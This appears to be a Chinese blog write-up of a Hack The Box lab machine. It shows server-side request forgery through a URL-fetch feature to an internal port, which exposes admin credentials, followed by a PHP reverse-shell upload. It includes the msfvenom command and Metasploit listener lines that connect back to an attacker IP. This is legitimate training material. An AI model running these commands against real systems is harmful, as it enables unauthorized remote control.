利用域名解析协议+特殊文件查看+php反向shell来getshell

本文介绍了通过修改域名解析,利用URL访问文件功能尝试访问被禁端口,从而发现账号密码。进一步通过80端口的管理界面上传PHP反向shell,借助msfvenom创建payload,并设置监听,最终获取远程主机控制权的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

发现443端口上提示有个staging.love.htb域名,很好,那么我们可以去修改
/etc/hosts的文件,指定这个域名的解析ip为10.10.10.239,然后就可以去访问这个域名了,kali中的修改命令如下:vim /etc/hosts
成功访问,结果如下:

在这里插入图片描述
home看起来没有什么特别值得关注的,直接到demo
在这里插入图片描述
发现可以通过 “url地址” 去访问文件,于是想起了那个被禁止的5000端口,于是尝试一下,看看能不能访问,命令 “ localhost:5000 ” ,访问结果如下:
在这里插入图片描述
在这里插入图片描述
成功获取账号与密码:
账号:admin
密码:@LoveIsInTheAir!!! (咳咳,翻译:爱在空气里,所以说啊,爱不可靠啊)
80端口不是有个登录界面吗?直接输入账号密码,然后就可以登录进去了
进入后台的管理界面如下:
在这里插入图片描述
然后找到这个:
在这里插入图片描述
点击new:
在这里插入图片描述
这里有个photo的地方, 可以上传php文件,那么我们就可以上传一个php/reverse_tcp文件用来反向连接我们的主机,我们可以使用msfvenom来创建一个php的反向shell文件,命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.15.156 lport=3333 -f raw -o a.php
然后使用kali另外的终端来监听,命令如下:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 3333
exploit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值